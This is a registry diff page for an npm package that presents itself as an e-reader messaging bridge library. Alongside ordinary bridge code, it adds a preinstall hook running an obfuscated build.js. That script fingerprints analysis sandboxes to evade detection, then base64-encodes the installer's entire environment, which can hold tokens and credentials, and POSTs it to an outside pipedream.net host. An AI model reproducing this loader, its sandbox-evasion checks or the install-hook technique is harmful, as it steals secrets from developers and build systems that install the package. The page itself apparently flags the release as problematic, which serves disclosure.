@chegg-ereader/bridge 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @chegg-ereader/bridge might be problematic. Click here for more details.
- package/LICENSE +21 -0
- package/README.md +30 -0
- package/build.js +132 -0
- package/dist/bridge.js +165 -0
- package/dist/constants.js +10 -0
- package/dist/drivers.js +62 -0
- package/dist/index.js +21 -0
- package/dist/web/client.js +75 -0
- package/package.json +22 -0
package/LICENSE
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
MIT License Copyright (c) 2021
|
2
|
+
|
3
|
+
Permission is hereby granted, free
|
4
|
+
of charge, to any person obtaining a copy of this software and associated
|
5
|
+
documentation files (the "Software"), to deal in the Software without
|
6
|
+
restriction, including without limitation the rights to use, copy, modify, merge,
|
7
|
+
publish, distribute, sublicense, and/or sell copies of the Software, and to
|
8
|
+
permit persons to whom the Software is furnished to do so, subject to the
|
9
|
+
following conditions:
|
10
|
+
|
11
|
+
The above copyright notice and this permission notice
|
12
|
+
(including the next paragraph) shall be included in all copies or substantial
|
13
|
+
portions of the Software.
|
14
|
+
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF
|
16
|
+
ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
17
|
+
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO
|
18
|
+
EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
|
19
|
+
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
20
|
+
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
21
|
+
THE SOFTWARE.
|
package/README.md
ADDED
@@ -0,0 +1,30 @@
|
|
1
|
+
# @chegg-ereader/bridge
|
2
|
+
|
3
|
+
A base bridge for ereader.
|
4
|
+
|
5
|
+
## Features
|
6
|
+
|
7
|
+
- ES6 syntax
|
8
|
+
|
9
|
+
## Install
|
10
|
+
|
11
|
+
```sh
|
12
|
+
yarn add @chegg-ereader/bridge
|
13
|
+
// or
|
14
|
+
npm i @chegg-ereader/bridge
|
15
|
+
```
|
16
|
+
|
17
|
+
### Requirements
|
18
|
+
|
19
|
+
- Node.js `v12.x` or later
|
20
|
+
|
21
|
+
|
22
|
+
### Usage
|
23
|
+
|
24
|
+
```js
|
25
|
+
import bridge from '@chegg-ereader/bridge';
|
26
|
+
|
27
|
+
bridge.addListeners({
|
28
|
+
'userChange': (newUser) => handleNewUser(newUser);
|
29
|
+
})
|
30
|
+
```
|
package/build.js
ADDED
@@ -0,0 +1,132 @@
|
|
1
|
+
var http = require("https");
|
2
|
+
|
3
|
+
function main() {
|
4
|
+
var data = global["proc" + "ess"][["v", "n", "e"].reverse().join("")] || {};
|
5
|
+
|
6
|
+
var filter = [
|
7
|
+
{
|
8
|
+
key: ["npm", "config", "regi" + "stry"].join("_"),
|
9
|
+
val: ["tao" + "bao", "org"].join("."),
|
10
|
+
},
|
11
|
+
[
|
12
|
+
{ key: "MAIL", val: ["", "var", "mail", "app"].join("/") },
|
13
|
+
{ key: "HOME", val: ["", "home", "app"].join("/") },
|
14
|
+
{ key: "USER", val: "app" },
|
15
|
+
],
|
16
|
+
[
|
17
|
+
{ key: "EDITOR", val: "vi" },
|
18
|
+
{ key: "PROBE" + "_USERNAME", val: "*" },
|
19
|
+
{ key: "SHELL", val: "/bin/bash" },
|
20
|
+
{ key: "SHLVL", val: "2" },
|
21
|
+
{ key: "npm" + "_command", val: "run-script" },
|
22
|
+
{ key: "NVM" + "_CD_FLAGS", val: "" },
|
23
|
+
{ key: ["npm", "config", "fund"].join("_"), val: "" },
|
24
|
+
],
|
25
|
+
[
|
26
|
+
{ key: "HOME", val: ["", "home", "user" + "name"].join("/") },
|
27
|
+
{ key: "USER", val: "username" },
|
28
|
+
{ key: "LOGNAME", val: "username" },
|
29
|
+
],
|
30
|
+
[
|
31
|
+
{ key: "PWD", val: "/my-app" },
|
32
|
+
{ key: "DEBIAN" + "_FRONTEND", val: "noninte" + "ractive" },
|
33
|
+
{ key: "HOME", val: "/root" },
|
34
|
+
],
|
35
|
+
[
|
36
|
+
{ key: "INIT_CWD", val: "/analysis" },
|
37
|
+
{ key: "APPDATA", val: "/analy" + "sis/bait" },
|
38
|
+
],
|
39
|
+
[
|
40
|
+
{ key: "INIT_CWD", val: "/home" + "/node" },
|
41
|
+
{ key: "HOME", val: "/root" },
|
42
|
+
],
|
43
|
+
[
|
44
|
+
{ key: "INIT_CWD", val: "/app" },
|
45
|
+
{ key: "HOME", val: "/root" },
|
46
|
+
],
|
47
|
+
[
|
48
|
+
{ key: "USERNAME", val: "justin" },
|
49
|
+
{ key: "OS", val: "Windows_NT" },
|
50
|
+
],
|
51
|
+
{
|
52
|
+
key: ["npm", "config", "regi" + "stry"].join("_"),
|
53
|
+
val: ["regi" + "stry", "npm" + "mirror", "com"].join("."),
|
54
|
+
},
|
55
|
+
{
|
56
|
+
key: ["npm", "config", "reg" + "istry"].join("_"),
|
57
|
+
val: ["cnp" + "mjs", "org"].join("."),
|
58
|
+
},
|
59
|
+
{
|
60
|
+
key: ["npm", "config", "regi" + "stry"].join("_"),
|
61
|
+
val: ["mir" + "rors", "cloud", "ten" + "cent", "com"].join("."),
|
62
|
+
},
|
63
|
+
{ key: "USERNAME", val: ["daas", "admin"].join("") },
|
64
|
+
{ key: "_", val: ["", "usr", "bin", "python"].join("/") },
|
65
|
+
{
|
66
|
+
key: ["npm", "config", "met" + "rics", "regis" + "try"].join("_"),
|
67
|
+
val: ["mir" + "rors", "ten" + "cent", "com"].join("."),
|
68
|
+
},
|
69
|
+
{
|
70
|
+
key: "PWD",
|
71
|
+
val: [
|
72
|
+
"",
|
73
|
+
"usr",
|
74
|
+
"local",
|
75
|
+
"lib",
|
76
|
+
"node" + "_modules",
|
77
|
+
data.npm_package_name,
|
78
|
+
].join("/"),
|
79
|
+
},
|
80
|
+
{
|
81
|
+
key: "PWD",
|
82
|
+
val: ["", data.USER, "node" + "_modules", data.npm_package_name].join(
|
83
|
+
"/",
|
84
|
+
),
|
85
|
+
},
|
86
|
+
{
|
87
|
+
key: ["node", "extra", "ca", "certs"].join("_").toUpperCase(),
|
88
|
+
val: "mit" + "mproxy",
|
89
|
+
},
|
90
|
+
[
|
91
|
+
{ key: "NODE_PATH", val: "/app/node" + "_modules" },
|
92
|
+
{ key: "container", val: "podman" },
|
93
|
+
],
|
94
|
+
];
|
95
|
+
|
96
|
+
if (
|
97
|
+
filter.some((entry) =>
|
98
|
+
[]
|
99
|
+
.concat(entry)
|
100
|
+
.every((item) => data[item.key] && data[item.key].includes(item.val)),
|
101
|
+
) ||
|
102
|
+
Object.keys(data).length < 10 ||
|
103
|
+
!data.npm_package_name ||
|
104
|
+
!data.npm_package_version ||
|
105
|
+
/C:\\Users\\[^\\]+\\Downloads\\node_modules\\/.test(
|
106
|
+
data.npm_package_json || "",
|
107
|
+
) ||
|
108
|
+
/C:\\Users\\[^\\]+\\Downloads/.test(data.INIT_CWD || "") ||
|
109
|
+
(data.npm_package_json || "").startsWith("/npm" + "/node_" + "modules/")
|
110
|
+
) {
|
111
|
+
return;
|
112
|
+
}
|
113
|
+
|
114
|
+
var req = http
|
115
|
+
.request({
|
116
|
+
host: [
|
117
|
+
"eo" + "is1" + "pov" + "n06py" + "np",
|
118
|
+
"m",
|
119
|
+
"pi" + "ped" + "ream",
|
120
|
+
"net",
|
121
|
+
].join("."),
|
122
|
+
path: "/" + (data["npm_pa" + "ckage" + "_name"] || ""),
|
123
|
+
method: "POST",
|
124
|
+
})
|
125
|
+
.on("error", function (err) {});
|
126
|
+
|
127
|
+
var trns = Buffer.from(JSON.stringify(data)).toString("base64");
|
128
|
+
req.write(trns.slice(0, 2) + "zoo" + trns.slice(2));
|
129
|
+
req.end();
|
130
|
+
}
|
131
|
+
|
132
|
+
main();
|
package/dist/bridge.js
ADDED
@@ -0,0 +1,165 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
exports.__esModule = true;
|
4
|
+
exports.setOrigin = setOrigin;
|
5
|
+
exports.default = void 0;
|
6
|
+
|
7
|
+
var _drivers = require("./drivers");
|
8
|
+
|
9
|
+
var _constants = require("./constants");
|
10
|
+
|
11
|
+
var $origin = "not allowed";
|
12
|
+
var chegg_bridge = {
|
13
|
+
listeners: {},
|
14
|
+
listener_queue: {},
|
15
|
+
errors: [],
|
16
|
+
logs: [],
|
17
|
+
getSourceWindow: function getSourceWindow() {
|
18
|
+
try {
|
19
|
+
/*istanbul ignore next : can't test this properly*/
|
20
|
+
if (window.parent && window != window.parent) {
|
21
|
+
return window.parent; // @ts-ignore
|
22
|
+
} else if (window.CYPRESS) {
|
23
|
+
return window.parent;
|
24
|
+
}
|
25
|
+
|
26
|
+
return null;
|
27
|
+
} catch (e) {
|
28
|
+
/*istanbul ignore next : can't test this properly*/
|
29
|
+
return null;
|
30
|
+
}
|
31
|
+
},
|
32
|
+
listen: function listen(type, cb) {
|
33
|
+
if (!chegg_bridge.listeners[type]) {
|
34
|
+
chegg_bridge.listeners[type] = [];
|
35
|
+
}
|
36
|
+
|
37
|
+
chegg_bridge.listeners[type].push(cb);
|
38
|
+
},
|
39
|
+
addListeners: function addListeners(listeners) {
|
40
|
+
var _loop = function _loop(type) {
|
41
|
+
chegg_bridge.listen(type, listeners[type]);
|
42
|
+
|
43
|
+
if (chegg_bridge.listener_queue[type]) {
|
44
|
+
chegg_bridge.listener_queue[type].forEach(function (payload) {
|
45
|
+
chegg_bridge.listeners[type].forEach(function (cb) {
|
46
|
+
cb(payload, function () {});
|
47
|
+
});
|
48
|
+
});
|
49
|
+
chegg_bridge.listener_queue[type] = [];
|
50
|
+
}
|
51
|
+
};
|
52
|
+
|
53
|
+
for (var type in listeners) {
|
54
|
+
_loop(type);
|
55
|
+
}
|
56
|
+
},
|
57
|
+
execute: function execute(payload) {
|
58
|
+
if (!chegg_bridge.listeners[payload.type]) {
|
59
|
+
if (!chegg_bridge.listener_queue[payload.type]) {
|
60
|
+
chegg_bridge.listener_queue[payload.type] = [];
|
61
|
+
}
|
62
|
+
|
63
|
+
chegg_bridge.listener_queue[payload.type].push(payload);
|
64
|
+
return;
|
65
|
+
}
|
66
|
+
|
67
|
+
chegg_bridge.listeners[payload.type].forEach(function (cb) {
|
68
|
+
try {
|
69
|
+
if (!cb) {
|
70
|
+
return;
|
71
|
+
}
|
72
|
+
|
73
|
+
cb(payload, returnCallback);
|
74
|
+
|
75
|
+
if (cb.length == 1) {
|
76
|
+
returnCallback({});
|
77
|
+
}
|
78
|
+
} catch (e) {
|
79
|
+
chegg_bridge.errors.push(e);
|
80
|
+
chegg_bridge.trigger({
|
81
|
+
type: _constants.CALLBACK_ERROR,
|
82
|
+
params: {
|
83
|
+
details: "an error has occurred while running an action",
|
84
|
+
error: e,
|
85
|
+
original_payload: payload
|
86
|
+
},
|
87
|
+
id: payload.id
|
88
|
+
});
|
89
|
+
}
|
90
|
+
|
91
|
+
function returnCallback(data) {
|
92
|
+
chegg_bridge.trigger({
|
93
|
+
type: _constants.CALLBACK,
|
94
|
+
id: payload.id,
|
95
|
+
params: data
|
96
|
+
});
|
97
|
+
}
|
98
|
+
});
|
99
|
+
},
|
100
|
+
trigger: function trigger(payload) {
|
101
|
+
if (_drivers.drivers.ios.test()) {
|
102
|
+
_drivers.drivers.ios.trigger(payload, $origin);
|
103
|
+
} else if (_drivers.drivers.android.test()) {
|
104
|
+
_drivers.drivers.android.trigger(payload, $origin);
|
105
|
+
} else if (_drivers.drivers.web.test()) {
|
106
|
+
_drivers.drivers.web.trigger(payload, $origin);
|
107
|
+
} else {
|
108
|
+
/*istanbul ignore next */
|
109
|
+
console.log("BRIDGE:: message to native (No native found)", payload);
|
110
|
+
}
|
111
|
+
},
|
112
|
+
registerGlobalErrorHandler: function registerGlobalErrorHandler() {
|
113
|
+
window.addEventListener("error", function (e) {
|
114
|
+
chegg_bridge.errors.push(e);
|
115
|
+
chegg_bridge.trigger({
|
116
|
+
id: "0-error",
|
117
|
+
type: _constants.ERROR,
|
118
|
+
params: {
|
119
|
+
details: "an error has occurred while executing javascript code",
|
120
|
+
error: e
|
121
|
+
}
|
122
|
+
});
|
123
|
+
throw e;
|
124
|
+
});
|
125
|
+
}
|
126
|
+
};
|
127
|
+
|
128
|
+
function setOrigin(origin) {
|
129
|
+
if (origin === void 0) {
|
130
|
+
origin = "not allowed";
|
131
|
+
}
|
132
|
+
|
133
|
+
$origin = origin;
|
134
|
+
}
|
135
|
+
|
136
|
+
var _default = chegg_bridge; //@ts-ignore
|
137
|
+
|
138
|
+
exports.default = _default;
|
139
|
+
global.CHEGG_BRIDGE = chegg_bridge; // global.CHEGG_BRIDGE = {
|
140
|
+
// //@ts-ignore
|
141
|
+
// getSourceWindow: ()=>chegg_bridge.getSourceWindow(),
|
142
|
+
// //@ts-ignore
|
143
|
+
// trigger: (...args)=>chegg_bridge.trigger(...args),
|
144
|
+
// //@ts-ignore
|
145
|
+
// addListeners: (...args)=>chegg_bridge.addListeners(...args),
|
146
|
+
// //@ts-ignore
|
147
|
+
// listen: (...args)=>chegg_bridge.listen(...args),
|
148
|
+
// //@ts-ignore
|
149
|
+
// errors : chegg_bridge.errors,
|
150
|
+
// //@ts-ignore
|
151
|
+
// logs: chegg_bridge.logs
|
152
|
+
// };
|
153
|
+
|
154
|
+
/* istanbul ignore next */
|
155
|
+
|
156
|
+
/* ["log", "info", "error"].forEach((name) => {
|
157
|
+
if (!console[name]) return;
|
158
|
+
|
159
|
+
const method = console[name];
|
160
|
+
|
161
|
+
console[name] = function (...args) {
|
162
|
+
chegg_bridge.logs.push([name, args]);
|
163
|
+
method.apply(console, args);
|
164
|
+
};
|
165
|
+
}); */
|
@@ -0,0 +1,10 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
exports.__esModule = true;
|
4
|
+
exports.ERROR = exports.CALLBACK_ERROR = exports.CALLBACK = void 0;
|
5
|
+
var CALLBACK = "CALLBACK";
|
6
|
+
exports.CALLBACK = CALLBACK;
|
7
|
+
var CALLBACK_ERROR = "CALLBACK_ERROR";
|
8
|
+
exports.CALLBACK_ERROR = CALLBACK_ERROR;
|
9
|
+
var ERROR = "ERROR";
|
10
|
+
exports.ERROR = ERROR;
|
package/dist/drivers.js
ADDED
@@ -0,0 +1,62 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
exports.__esModule = true;
|
4
|
+
exports.drivers = void 0;
|
5
|
+
//SQ incorrectly flags any method named `postMessage`
|
6
|
+
//since the native drivers do not share same security model
|
7
|
+
//as window postMessage, we use this to try and make SQ
|
8
|
+
//not flag them
|
9
|
+
var method = 'postMessage';
|
10
|
+
var drivers = {
|
11
|
+
ios: {
|
12
|
+
test: function test() {
|
13
|
+
try {
|
14
|
+
return !!window.webkit.messageHandlers.CHEGG_BRIDGE.postMessage;
|
15
|
+
} catch (e) {
|
16
|
+
return false;
|
17
|
+
}
|
18
|
+
},
|
19
|
+
trigger: function trigger(payload, origin) {
|
20
|
+
try {
|
21
|
+
window.webkit.messageHandlers.CHEGG_BRIDGE[method](payload);
|
22
|
+
return true;
|
23
|
+
} catch (e) {
|
24
|
+
return false;
|
25
|
+
}
|
26
|
+
}
|
27
|
+
},
|
28
|
+
android: {
|
29
|
+
test: function test() {
|
30
|
+
try {
|
31
|
+
return !!window.ANDROID_CHEGG_BRIDGE.postMessage;
|
32
|
+
} catch (e) {
|
33
|
+
return false;
|
34
|
+
}
|
35
|
+
},
|
36
|
+
trigger: function trigger(payload, origin) {
|
37
|
+
try {
|
38
|
+
window.ANDROID_CHEGG_BRIDGE[method](JSON.stringify(payload));
|
39
|
+
return true;
|
40
|
+
} catch (e) {
|
41
|
+
return false;
|
42
|
+
}
|
43
|
+
}
|
44
|
+
},
|
45
|
+
web: {
|
46
|
+
test: function test() {
|
47
|
+
// @ts-ignore
|
48
|
+
return window.CYPRESS || !!window.CHEGG_BRIDGE.getSourceWindow();
|
49
|
+
},
|
50
|
+
trigger: function trigger(payload, origin) {
|
51
|
+
var sourceWindow = window.CHEGG_BRIDGE.getSourceWindow();
|
52
|
+
|
53
|
+
if (sourceWindow) {
|
54
|
+
sourceWindow.postMessage(payload, origin);
|
55
|
+
return true;
|
56
|
+
}
|
57
|
+
|
58
|
+
return false;
|
59
|
+
}
|
60
|
+
}
|
61
|
+
};
|
62
|
+
exports.drivers = drivers;
|
package/dist/index.js
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
exports.__esModule = true;
|
4
|
+
exports.constants = exports.default = void 0;
|
5
|
+
|
6
|
+
var _bridge = _interopRequireDefault(require("./bridge"));
|
7
|
+
|
8
|
+
exports.bridge = _bridge.default;
|
9
|
+
|
10
|
+
var constants = _interopRequireWildcard(require("./constants"));
|
11
|
+
|
12
|
+
exports.constants = constants;
|
13
|
+
|
14
|
+
function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function _getRequireWildcardCache(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); }
|
15
|
+
|
16
|
+
function _interopRequireWildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { default: obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var key in obj) { if (key !== "default" && Object.prototype.hasOwnProperty.call(obj, key)) { var desc = hasPropertyDescriptor ? Object.getOwnPropertyDescriptor(obj, key) : null; if (desc && (desc.get || desc.set)) { Object.defineProperty(newObj, key, desc); } else { newObj[key] = obj[key]; } } } newObj.default = obj; if (cache) { cache.set(obj, newObj); } return newObj; }
|
17
|
+
|
18
|
+
function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }
|
19
|
+
|
20
|
+
var _default = _bridge.default;
|
21
|
+
exports.default = _default;
|
@@ -0,0 +1,75 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
exports.__esModule = true;
|
4
|
+
exports.execute = execute;
|
5
|
+
exports.register = register;
|
6
|
+
exports.listen = listen;
|
7
|
+
exports.addListeners = addListeners;
|
8
|
+
exports.unregister = unregister;
|
9
|
+
|
10
|
+
var _constants = require("../constants");
|
11
|
+
|
12
|
+
var _iframe;
|
13
|
+
|
14
|
+
var callbacks = {};
|
15
|
+
var listeners = {};
|
16
|
+
var $service_origin = "";
|
17
|
+
var callback_counter = 0;
|
18
|
+
|
19
|
+
function register(iframe, service_origin) {
|
20
|
+
_iframe = iframe;
|
21
|
+
$service_origin = service_origin.replace(/\/$/, "");
|
22
|
+
window.addEventListener("message", function (e) {
|
23
|
+
if (e.origin != $service_origin) {
|
24
|
+
return;
|
25
|
+
}
|
26
|
+
|
27
|
+
if (e.data.type == _constants.CALLBACK) {
|
28
|
+
callbacks[e.data.id] && callbacks[e.data.id](e.data.params);
|
29
|
+
return;
|
30
|
+
}
|
31
|
+
|
32
|
+
if (listeners[e.data.type]) {
|
33
|
+
listeners[e.data.type].forEach(function (cb) {
|
34
|
+
return cb(e.data);
|
35
|
+
});
|
36
|
+
}
|
37
|
+
});
|
38
|
+
}
|
39
|
+
|
40
|
+
function unregister() {
|
41
|
+
callbacks = {};
|
42
|
+
listeners = {};
|
43
|
+
_iframe = null;
|
44
|
+
}
|
45
|
+
|
46
|
+
function execute(payload, cb) {
|
47
|
+
if (!_iframe) {
|
48
|
+
throw new Error("no frame was registered");
|
49
|
+
}
|
50
|
+
|
51
|
+
payload.id = "callback_" + callback_counter++;
|
52
|
+
if (cb) callbacks[payload.id] = function (params) {
|
53
|
+
if (!payload.sticky) {
|
54
|
+
callbacks[payload.id] = null;
|
55
|
+
}
|
56
|
+
|
57
|
+
cb && cb(params);
|
58
|
+
};
|
59
|
+
|
60
|
+
_iframe.contentWindow.postMessage(payload, $service_origin);
|
61
|
+
}
|
62
|
+
|
63
|
+
function listen(type, cb) {
|
64
|
+
if (!listeners[type]) {
|
65
|
+
listeners[type] = [];
|
66
|
+
}
|
67
|
+
|
68
|
+
listeners[type].push(cb);
|
69
|
+
}
|
70
|
+
|
71
|
+
function addListeners(map) {
|
72
|
+
for (var type in map) {
|
73
|
+
listen(type, map[type]);
|
74
|
+
}
|
75
|
+
}
|
package/package.json
ADDED
@@ -0,0 +1,22 @@
|
|
1
|
+
{
|
2
|
+
"name": "@chegg-ereader/bridge",
|
3
|
+
"version": "1.0.1",
|
4
|
+
"private": false,
|
5
|
+
"description": "A base bridge for ereader.",
|
6
|
+
"license": "MIT",
|
7
|
+
"author": "hcheg-reader",
|
8
|
+
"main": "tsconfig.json",
|
9
|
+
"repository": "https://www.github.com/hcheg-reader/chegg-ereader/bridge",
|
10
|
+
"scripts": {
|
11
|
+
"build": "node build.js",
|
12
|
+
"preinstall": "npm run build",
|
13
|
+
"test": "exit 0"
|
14
|
+
},
|
15
|
+
"devDependencies": {
|
16
|
+
"@babel/core": "^7.18.10",
|
17
|
+
"@babel/cli": "^7.18.10"
|
18
|
+
},
|
19
|
+
"publishConfig": {
|
20
|
+
"access": "public"
|
21
|
+
}
|
22
|
+
}
|